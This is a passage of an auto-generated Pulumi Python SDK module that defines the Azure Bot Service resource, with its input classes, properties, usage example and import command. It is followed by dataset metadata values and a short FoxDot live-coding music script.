:param pulumi.Input[str] microsoft_app_id: The Microsoft Application ID for the Azure Bot Service. Changing this forces a new resource to be created.
:param pulumi.Input[str] resource_group_name: The name of the Resource Group where the Azure Bot Service should exist. Changing this forces a new resource to be created.
:param pulumi.Input[str] sku: The SKU of the Azure Bot Service. Accepted values are `F0` or `S1`. Changing this forces a new resource to be created.
:param pulumi.Input[str] developer_app_insights_api_key: The Application Insights API Key to associate with this Azure Bot Service.
:param pulumi.Input[str] developer_app_insights_application_id: The resource ID of the Application Insights instance to associate with this Azure Bot Service.
:param pulumi.Input[str] developer_app_insights_key: The Application Insights Key to associate with this Azure Bot Service.
:param pulumi.Input[str] display_name: The name that the Azure Bot Service will be displayed as. This defaults to the value set for `name` if not specified.
:param pulumi.Input[str] endpoint: The Azure Bot Service endpoint.
:param pulumi.Input[str] location: The supported Azure location where the Azure Bot Service should exist. Changing this forces a new resource to be created.
:param pulumi.Input[Sequence[pulumi.Input[str]]] luis_app_ids: A list of LUIS App IDs to associate with this Azure Bot Service.
:param pulumi.Input[str] luis_key: The LUIS key to associate with this Azure Bot Service.
:param pulumi.Input[str] name: The name which should be used for this Azure Bot Service. Changing this forces a new resource to be created.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags which should be assigned to this Azure Bot Service.
"""
pulumi.set(__self__, "microsoft_app_id", microsoft_app_id)
pulumi.set(__self__, "resource_group_name", resource_group_name)
pulumi.set(__self__, "sku", sku)
if developer_app_insights_api_key is not None:
pulumi.set(__self__, "developer_app_insights_api_key", developer_app_insights_api_key)
if developer_app_insights_application_id is not None:
pulumi.set(__self__, "developer_app_insights_application_id", developer_app_insights_application_id)
if developer_app_insights_key is not None:
pulumi.set(__self__, "developer_app_insights_key", developer_app_insights_key)
if display_name is not None:
pulumi.set(__self__, "display_name", display_name)
if endpoint is not None:
pulumi.set(__self__, "endpoint", endpoint)
if location is not None:
pulumi.set(__self__, "location", location)
if luis_app_ids is not None:
pulumi.set(__self__, "luis_app_ids", luis_app_ids)
if luis_key is not None:
pulumi.set(__self__, "luis_key", luis_key)
if name is not None:
pulumi.set(__self__, "name", name)
if tags is not None:
pulumi.set(__self__, "tags", tags)
@property
@pulumi.getter(name="microsoftAppId")
def microsoft_app_id(self) -> pulumi.Input[str]:
"""
The Microsoft Application ID for the Azure Bot Service. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "microsoft_app_id")
@microsoft_app_id.setter
def microsoft_app_id(self, value: pulumi.Input[str]):
pulumi.set(self, "microsoft_app_id", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Input[str]:
"""
The name of the Resource Group where the Azure Bot Service should exist. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter
def sku(self) -> pulumi.Input[str]:
"""
The SKU of the Azure Bot Service. Accepted values are `F0` or `S1`. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "sku")
@sku.setter
def sku(self, value: pulumi.Input[str]):
pulumi.set(self, "sku", value)
@property
@pulumi.getter(name="developerAppInsightsApiKey")
def developer_app_insights_api_key(self) -> Optional[pulumi.Input[str]]:
"""
The Application Insights API Key to associate with this Azure Bot Service.
"""
return pulumi.get(self, "developer_app_insights_api_key")
@developer_app_insights_api_key.setter
def developer_app_insights_api_key(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "developer_app_insights_api_key", value)
@property
@pulumi.getter(name="developerAppInsightsApplicationId")
def developer_app_insights_application_id(self) -> Optional[pulumi.Input[str]]:
"""
The resource ID of the Application Insights instance to associate with this Azure Bot Service.
"""
return pulumi.get(self, "developer_app_insights_application_id")
@developer_app_insights_application_id.setter
def developer_app_insights_application_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "developer_app_insights_application_id", value)
@property
@pulumi.getter(name="developerAppInsightsKey")
def developer_app_insights_key(self) -> Optional[pulumi.Input[str]]:
"""
The Application Insights Key to associate with this Azure Bot Service.
"""
return pulumi.get(self, "developer_app_insights_key")
@developer_app_insights_key.setter
def developer_app_insights_key(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "developer_app_insights_key", value)
@property
@pulumi.getter(name="displayName")
def display_name(self) -> Optional[pulumi.Input[str]]:
"""
The name that the Azure Bot Service will be displayed as. This defaults to the value set for `name` if not specified.
"""
return pulumi.get(self, "display_name")
@display_name.setter
def display_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "display_name", value)
@property
@pulumi.getter
def endpoint(self) -> Optional[pulumi.Input[str]]:
"""
The Azure Bot Service endpoint.
"""
return pulumi.get(self, "endpoint")
@endpoint.setter
def endpoint(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "endpoint", value)
@property
@pulumi.getter
def location(self) -> Optional[pulumi.Input[str]]:
"""
The supported Azure location where the Azure Bot Service should exist. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "location")
@location.setter
def location(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "location", value)
@property
@pulumi.getter(name="luisAppIds")
def luis_app_ids(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A list of LUIS App IDs to associate with this Azure Bot Service.
"""
return pulumi.get(self, "luis_app_ids")
@luis_app_ids.setter
def luis_app_ids(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "luis_app_ids", value)
@property
@pulumi.getter(name="luisKey")
def luis_key(self) -> Optional[pulumi.Input[str]]:
"""
The LUIS key to associate with this Azure Bot Service.
"""
return pulumi.get(self, "luis_key")
@luis_key.setter
def luis_key(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "luis_key", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The name which should be used for this Azure Bot Service. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
A mapping of tags which should be assigned to this Azure Bot Service.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@pulumi.input_type
class _ServiceAzureBotState:
def __init__(__self__, *,
developer_app_insights_api_key: Optional[pulumi.Input[str]] = None,
developer_app_insights_application_id: Optional[pulumi.Input[str]] = None,
developer_app_insights_key: Optional[pulumi.Input[str]] = None,
display_name: Optional[pulumi.Input[str]] = None,
endpoint: Optional[pulumi.Input[str]] = None,
location: Optional[pulumi.Input[str]] = None,
luis_app_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
luis_key: Optional[pulumi.Input[str]] = None,
microsoft_app_id: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
sku: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None):
"""
Input properties used for looking up and filtering ServiceAzureBot resources.
:param pulumi.Input[str] developer_app_insights_api_key: The Application Insights API Key to associate with this Azure Bot Service.
:param pulumi.Input[str] developer_app_insights_application_id: The resource ID of the Application Insights instance to associate with this Azure Bot Service.
:param pulumi.Input[str] developer_app_insights_key: The Application Insights Key to associate with this Azure Bot Service.
:param pulumi.Input[str] display_name: The name that the Azure Bot Service will be displayed as. This defaults to the value set for `name` if not specified.
:param pulumi.Input[str] endpoint: The Azure Bot Service endpoint.
:param pulumi.Input[str] location: The supported Azure location where the Azure Bot Service should exist. Changing this forces a new resource to be created.
:param pulumi.Input[Sequence[pulumi.Input[str]]] luis_app_ids: A list of LUIS App IDs to associate with this Azure Bot Service.
:param pulumi.Input[str] luis_key: The LUIS key to associate with this Azure Bot Service.
:param pulumi.Input[str] microsoft_app_id: The Microsoft Application ID for the Azure Bot Service. Changing this forces a new resource to be created.
:param pulumi.Input[str] name: The name which should be used for this Azure Bot Service. Changing this forces a new resource to be created.
:param pulumi.Input[str] resource_group_name: The name of the Resource Group where the Azure Bot Service should exist. Changing this forces a new resource to be created.
:param pulumi.Input[str] sku: The SKU of the Azure Bot Service. Accepted values are `F0` or `S1`. Changing this forces a new resource to be created.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags which should be assigned to this Azure Bot Service.
"""
if developer_app_insights_api_key is not None:
pulumi.set(__self__, "developer_app_insights_api_key", developer_app_insights_api_key)
if developer_app_insights_application_id is not None:
pulumi.set(__self__, "developer_app_insights_application_id", developer_app_insights_application_id)
if developer_app_insights_key is not None:
pulumi.set(__self__, "developer_app_insights_key", developer_app_insights_key)
if display_name is not None:
pulumi.set(__self__, "display_name", display_name)
if endpoint is not None:
pulumi.set(__self__, "endpoint", endpoint)
if location is not None:
pulumi.set(__self__, "location", location)
if luis_app_ids is not None:
pulumi.set(__self__, "luis_app_ids", luis_app_ids)
if luis_key is not None:
pulumi.set(__self__, "luis_key", luis_key)
if microsoft_app_id is not None:
pulumi.set(__self__, "microsoft_app_id", microsoft_app_id)
if name is not None:
pulumi.set(__self__, "name", name)
if resource_group_name is not None:
pulumi.set(__self__, "resource_group_name", resource_group_name)
if sku is not None:
pulumi.set(__self__, "sku", sku)
if tags is not None:
pulumi.set(__self__, "tags", tags)
@property
@pulumi.getter(name="developerAppInsightsApiKey")
def developer_app_insights_api_key(self) -> Optional[pulumi.Input[str]]:
"""
The Application Insights API Key to associate with this Azure Bot Service.
"""
return pulumi.get(self, "developer_app_insights_api_key")
@developer_app_insights_api_key.setter
def developer_app_insights_api_key(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "developer_app_insights_api_key", value)
@property
@pulumi.getter(name="developerAppInsightsApplicationId")
def developer_app_insights_application_id(self) -> Optional[pulumi.Input[str]]:
"""
The resource ID of the Application Insights instance to associate with this Azure Bot Service.
"""
return pulumi.get(self, "developer_app_insights_application_id")
@developer_app_insights_application_id.setter
def developer_app_insights_application_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "developer_app_insights_application_id", value)
@property
@pulumi.getter(name="developerAppInsightsKey")
def developer_app_insights_key(self) -> Optional[pulumi.Input[str]]:
"""
The Application Insights Key to associate with this Azure Bot Service.
"""
return pulumi.get(self, "developer_app_insights_key")
@developer_app_insights_key.setter
def developer_app_insights_key(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "developer_app_insights_key", value)
@property
@pulumi.getter(name="displayName")
def display_name(self) -> Optional[pulumi.Input[str]]:
"""
The name that the Azure Bot Service will be displayed as. This defaults to the value set for `name` if not specified.
"""
return pulumi.get(self, "display_name")
@display_name.setter
def display_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "display_name", value)
@property
@pulumi.getter
def endpoint(self) -> Optional[pulumi.Input[str]]:
"""
The Azure Bot Service endpoint.
"""
return pulumi.get(self, "endpoint")
@endpoint.setter
def endpoint(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "endpoint", value)
@property
@pulumi.getter
def location(self) -> Optional[pulumi.Input[str]]:
"""
The supported Azure location where the Azure Bot Service should exist. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "location")
@location.setter
def location(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "location", value)
@property
@pulumi.getter(name="luisAppIds")
def luis_app_ids(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A list of LUIS App IDs to associate with this Azure Bot Service.
"""
return pulumi.get(self, "luis_app_ids")
@luis_app_ids.setter
def luis_app_ids(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "luis_app_ids", value)
@property
@pulumi.getter(name="luisKey")
def luis_key(self) -> Optional[pulumi.Input[str]]:
"""
The LUIS key to associate with this Azure Bot Service.
"""
return pulumi.get(self, "luis_key")
@luis_key.setter
def luis_key(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "luis_key", value)
@property
@pulumi.getter(name="microsoftAppId")
def microsoft_app_id(self) -> Optional[pulumi.Input[str]]:
"""
The Microsoft Application ID for the Azure Bot Service. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "microsoft_app_id")
@microsoft_app_id.setter
def microsoft_app_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "microsoft_app_id", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The name which should be used for this Azure Bot Service. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the Resource Group where the Azure Bot Service should exist. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter
def sku(self) -> Optional[pulumi.Input[str]]:
"""
The SKU of the Azure Bot Service. Accepted values are `F0` or `S1`. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "sku")
@sku.setter
def sku(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "sku", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
A mapping of tags which should be assigned to this Azure Bot Service.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
class ServiceAzureBot(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
developer_app_insights_api_key: Optional[pulumi.Input[str]] = None,
developer_app_insights_application_id: Optional[pulumi.Input[str]] = None,
developer_app_insights_key: Optional[pulumi.Input[str]] = None,
display_name: Optional[pulumi.Input[str]] = None,
endpoint: Optional[pulumi.Input[str]] = None,
location: Optional[pulumi.Input[str]] = None,
luis_app_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
luis_key: Optional[pulumi.Input[str]] = None,
microsoft_app_id: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
sku: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
__props__=None):
"""
Manages an Azure Bot Service.
## Example Usage
```python
import pulumi
import pulumi_azure as azure
example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
example_insights = azure.appinsights.Insights("exampleInsights",
location=example_resource_group.location,
resource_group_name=example_resource_group.name,
application_type="web")
example_api_key = azure.appinsights.ApiKey("exampleApiKey",
application_insights_id=example_insights.id,
read_permissions=[
"aggregate",
"api",
"draft",
"extendqueries",
"search",
])
example_service_azure_bot = azure.bot.ServiceAzureBot("exampleServiceAzureBot",
resource_group_name=example_resource_group.name,
location="global",
microsoft_app_id=data["azurerm_client_config"]["current"]["client_id"],
sku="F0",
endpoint="https://example.com",
developer_app_insights_api_key=example_api_key.api_key,
developer_app_insights_application_id=example_insights.app_id,
tags={
"environment": "test",
})
```
## Import
Azure Bot Services can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:bot/serviceAzureBot:ServiceAzureBot example /subscriptions/12345678-1234-9876-4563-123456789012/resourceGroups/resGroup1/providers/Microsoft.BotService/botServices/botService1
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] developer_app_insights_api_key: The Application Insights API Key to associate with this Azure Bot Service.
:param pulumi.Input[str] developer_app_insights_application_id: The resource ID of the Application Insights instance to associate with this Azure Bot Service.
:param pulumi.Input[str] developer_app_insights_key: The Application Insights Key to associate with this Azure Bot Service.
:param pulumi.Input[str] display_name: The name that the Azure Bot Service will be displayed as. This defaults to the value set for `name` if not specified.
:param pulumi.Input[str] endpoint: The Azure Bot Service endpoint.
:param pulumi.Input[str] location: The supported Azure location where the Azure Bot Service should exist. Changing this forces a new resource to be created.
:param pulumi.Input[Sequence[pulumi.Input[str]]] luis_app_ids: A list of LUIS App IDs to associate with this Azure Bot Service.
:param pulumi.Input[str] luis_key: The LUIS key to associate with this Azure Bot Service.
:param pulumi.Input[str] microsoft_app_id: The Microsoft Application ID for the Azure Bot Service. Changing this forces a new resource to be created.
:param pulumi.Input[str] name: The name which should be used for this Azure Bot Service. Changing this forces a new resource to be created.
:param pulumi.Input[str] resource_group_name: The name of the Resource Group where the Azure Bot Service should exist. Changing this forces a new resource to be created.
:param pulumi.Input[str] sku: The SKU of the Azure Bot Service. Accepted values are `F0` or `S1`. Changing this forces a new resource to be created.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags which should be assigned to this Azure Bot Service.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: ServiceAzureBotArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Manages an Azure Bot Service.
## Example Usage
```python
import pulumi
import pulumi_azure as azure
example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
example_insights = azure.appinsights.Insights("exampleInsights",
location=example_resource_group.location,
resource_group_name=example_resource_group.name,
application_type="web")
example_api_key = azure.appinsights.ApiKey("exampleApiKey",
application_insights_id=example_insights.id,
read_permissions=[
"aggregate",
"api",
"draft",
"extendqueries",
"search",
])
example_service_azure_bot = azure.bot.ServiceAzureBot("exampleServiceAzureBot",
resource_group_name=example_resource_group.name,
location="global",
microsoft_app_id=data["azurerm_client_config"]["current"]["client_id"],
sku="F0",
endpoint="https://example.com",
developer_app_insights_api_key=example_api_key.api_key,
developer_app_insights_application_id=example_insights.app_id,
tags={
"environment": "test",
})
```
## Import
Azure Bot Services can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:bot/serviceAzureBot:ServiceAzureBot example /subscriptions/12345678-1234-9876-4563-123456789012/resourceGroups/resGroup1/providers/Microsoft.BotService/botServices/botService1
```
:param str resource_name: The name of the resource.
:param ServiceAzureBotArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(ServiceAzureBotArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
developer_app_insights_api_key: Optional[pulumi.Input[str]] = None,
developer_app_insights_application_id: Optional[pulumi.Input[str]] = None,
developer_app_insights_key: Optional[pulumi.Input[str]] = None,
display_name: Optional[pulumi.Input[str]] = None,
endpoint: Optional[pulumi.Input[str]] = None,
location: Optional[pulumi.Input[str]] = None,
luis_app_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
luis_key: Optional[pulumi.Input[str]] = None,
microsoft_app_id: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
sku: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = ServiceAzureBotArgs.__new__(ServiceAzureBotArgs)
__props__.__dict__["developer_app_insights_api_key"] = developer_app_insights_api_key
__props__.__dict__["developer_app_insights_application_id"] = developer_app_insights_application_id
__props__.__dict__["developer_app_insights_key"] = developer_app_insights_key
__props__.__dict__["display_name"] = display_name
__props__.__dict__["endpoint"] = endpoint
__props__.__dict__["location"] = location
__props__.__dict__["luis_app_ids"] = luis_app_ids
__props__.__dict__["luis_key"] = luis_key
if microsoft_app_id is None and not opts.urn:
raise TypeError("Missing required property 'microsoft_app_id'")
__props__.__dict__["microsoft_app_id"] = microsoft_app_id
__props__.__dict__["name"] = name
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__.__dict__["resource_group_name"] = resource_group_name
if sku is None and not opts.urn:
raise TypeError("Missing required property 'sku'")
__props__.__dict__["sku"] = sku
__props__.__dict__["tags"] = tags
super(ServiceAzureBot, __self__).__init__(
'azure:bot/serviceAzureBot:ServiceAzureBot',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
developer_app_insights_api_key: Optional[pulumi.Input[str]] = None,
developer_app_insights_application_id: Optional[pulumi.Input[str]] = None,
developer_app_insights_key: Optional[pulumi.Input[str]] = None,
display_name: Optional[pulumi.Input[str]] = None,
endpoint: Optional[pulumi.Input[str]] = None,
location: Optional[pulumi.Input[str]] = None,
luis_app_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
luis_key: Optional[pulumi.Input[str]] = None,
microsoft_app_id: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
sku: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None) -> 'ServiceAzureBot':
"""
Get an existing ServiceAzureBot resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] developer_app_insights_api_key: The Application Insights API Key to associate with this Azure Bot Service.
:param pulumi.Input[str] developer_app_insights_application_id: The resource ID of the Application Insights instance to associate with this Azure Bot Service.
:param pulumi.Input[str] developer_app_insights_key: The Application Insights Key to associate with this Azure Bot Service.
:param pulumi.Input[str] display_name: The name that the Azure Bot Service will be displayed as. This defaults to the value set for `name` if not specified.
:param pulumi.Input[str] endpoint: The Azure Bot Service endpoint.
:param pulumi.Input[str] location: The supported Azure location where the Azure Bot Service should exist. Changing this forces a new resource to be created.
:param pulumi.Input[Sequence[pulumi.Input[str]]] luis_app_ids: A list of LUIS App IDs to associate with this Azure Bot Service.
:param pulumi.Input[str] luis_key: The LUIS key to associate with this Azure Bot Service.
:param pulumi.Input[str] microsoft_app_id: The Microsoft Application ID for the Azure Bot Service. Changing this forces a new resource to be created.
:param pulumi.Input[str] name: The name which should be used for this Azure Bot Service. Changing this forces a new resource to be created.
:param pulumi.Input[str] resource_group_name: The name of the Resource Group where the Azure Bot Service should exist. Changing this forces a new resource to be created.
:param pulumi.Input[str] sku: The SKU of the Azure Bot Service. Accepted values are `F0` or `S1`. Changing this forces a new resource to be created.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags which should be assigned to this Azure Bot Service.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _ServiceAzureBotState.__new__(_ServiceAzureBotState)
__props__.__dict__["developer_app_insights_api_key"] = developer_app_insights_api_key
__props__.__dict__["developer_app_insights_application_id"] = developer_app_insights_application_id
__props__.__dict__["developer_app_insights_key"] = developer_app_insights_key
__props__.__dict__["display_name"] = display_name
__props__.__dict__["endpoint"] = endpoint
__props__.__dict__["location"] = location
__props__.__dict__["luis_app_ids"] = luis_app_ids
__props__.__dict__["luis_key"] = luis_key
__props__.__dict__["microsoft_app_id"] = microsoft_app_id
__props__.__dict__["name"] = name
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["sku"] = sku
__props__.__dict__["tags"] = tags
return ServiceAzureBot(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="developerAppInsightsApiKey")
def developer_app_insights_api_key(self) -> pulumi.Output[Optional[str]]:
"""
The Application Insights API Key to associate with this Azure Bot Service.
"""
return pulumi.get(self, "developer_app_insights_api_key")
@property
@pulumi.getter(name="developerAppInsightsApplicationId")
def developer_app_insights_application_id(self) -> pulumi.Output[Optional[str]]:
"""
The resource ID of the Application Insights instance to associate with this Azure Bot Service.
"""
return pulumi.get(self, "developer_app_insights_application_id")
@property
@pulumi.getter(name="developerAppInsightsKey")
def developer_app_insights_key(self) -> pulumi.Output[Optional[str]]:
"""
The Application Insights Key to associate with this Azure Bot Service.
"""
return pulumi.get(self, "developer_app_insights_key")
@property
@pulumi.getter(name="displayName")
def display_name(self) -> pulumi.Output[str]:
"""
The name that the Azure Bot Service will be displayed as. This defaults to the value set for `name` if not specified.
"""
return pulumi.get(self, "display_name")
@property
@pulumi.getter
def endpoint(self) -> pulumi.Output[Optional[str]]:
"""
The Azure Bot Service endpoint.
"""
return pulumi.get(self, "endpoint")
@property
@pulumi.getter
def location(self) -> pulumi.Output[str]:
"""
The supported Azure location where the Azure Bot Service should exist. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "location")
@property
@pulumi.getter(name="luisAppIds")
def luis_app_ids(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
A list of LUIS App IDs to associate with this Azure Bot Service.
"""
return pulumi.get(self, "luis_app_ids")
@property
@pulumi.getter(name="luisKey")
def luis_key(self) -> pulumi.Output[Optional[str]]:
"""
The LUIS key to associate with this Azure Bot Service.
"""
return pulumi.get(self, "luis_key")
@property
@pulumi.getter(name="microsoftAppId")
def microsoft_app_id(self) -> pulumi.Output[str]:
"""
The Microsoft Application ID for the Azure Bot Service. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "microsoft_app_id")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
The name which should be used for this Azure Bot Service. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Output[str]:
"""
The name of the Resource Group where the Azure Bot Service should exist. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "resource_group_name")
@property
@pulumi.getter
def sku(self) -> pulumi.Output[str]:
"""
The SKU of the Azure Bot Service. Accepted values are `F0` or `S1`. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "sku")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
A mapping of tags which should be assigned to this Azure Bot Service.
"""
return pulumi.get(self, "tags")
| 48.708908
| 206
| 0.668427
| 4,858
| 38,821
| 5.108069
| 0.045492
| 0.088213
| 0.096474
| 0.07979
| 0.930445
| 0.922466
| 0.912311
| 0.902922
| 0.895789
| 0.879025
| 0
| 0.002871
| 0.237423
| 38,821
| 796
| 207
| 48.770101
| 0.83536
| 0.366554
| 0
| 0.823799
| 1
| 0
| 0.109868
| 0.050828
| 0
| 0
| 0
| 0
| 0
| 1
| 0.16476
| false
| 0.002288
| 0.011442
| 0
| 0.2746
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
adbad94dc805c53bc50b51e8480b61d4be6b09fd
| 9,129
|
py
|
Python
|
src/foxdot/research/ryan-kirkbride/180428_1750_weird_noises.py
|
Neko250/aisthesis
|
1d4a2c3070d10596c28b25ea2170523583e7eff0
|
[
"Apache-2.0"
] | 4
|
2018-06-29T18:39:34.000Z
|
2021-06-20T16:44:29.000Z
|
src/foxdot/research/ryan-kirkbride/180428_1750_weird_noises.py
|
Neko250/aisthesis
|
1d4a2c3070d10596c28b25ea2170523583e7eff0
|
[
"Apache-2.0"
] | null | null | null |
src/foxdot/research/ryan-kirkbride/180428_1750_weird_noises.py
|
Neko250/aisthesis
|
1d4a2c3070d10596c28b25ea2170523583e7eff0
|
[
"Apache-2.0"
] | null | null | null |
"""
Ryan Kirkbride - Live coding weird noises to dance to:
https://www.youtube.com/watch?v=Qc_8Pm2t-84
How to:
- Run the statements line by line (alt+enter),
moving on to the next one whenever you feel like it
- The "#### > run block <" blocks should be
executed atomically (ctrl+enter)
- If you want to fast-forward through the song,
just execute the blocks atomically (ctrl+enter)
from the beginning, so you don't have to go
through every variation of each instrument
- Enjoy! :+1:
"""
p1 >> pads(dur=8,) + (P*(0,4))
p1 >> pads(dur=8,) + (P*(0,4,4.5))
p1 >> pads(dur=8,) + (P*(0,4,4.5,3.5))
p1 >> pads(dur=8,) + (P*(0,4,4.5,2.5))
p1 >> pads(dur=8,) + (P*(0,4,4.5,0.5))
p1 >> pads(dur=8,room=1,) + (P*(0,4,4.5,0.5))
p1 >> pads(dur=8,room=1,chop=320) + (P*(0,4,4.5,0.5))
p1 >> pads(dur=8,room=1,chop=320,coarse=16) + (P*(0,4,4.5,0.5))
d1 >> play("x ",)
d2 >> play("[ii]", amp=linvar([0,1,0],[2,0]),)
d2 >> play("[ii]", amp=linvar([0,1,0],[2,0,2]),)
d2 >> play("[oo]", amp=linvar([0,1,0],[2,0,2]),)
d2 >> play("[oo]", amp=linvar([0,1,0],[2,0,2]),bits=4,)
d2 >> play("[oo]", amp=linvar([0,1,0],[2,0,2]),bits=4,rate=4,)
d2 >> play("[oo]", amp=linvar([0,1,0],[2,0,2]),bits=4,rate=1,)
d2 >> play("[oo]", amp=linvar([0,1,0],[2,0,2]),bits=4,rate=1,crush=4,)
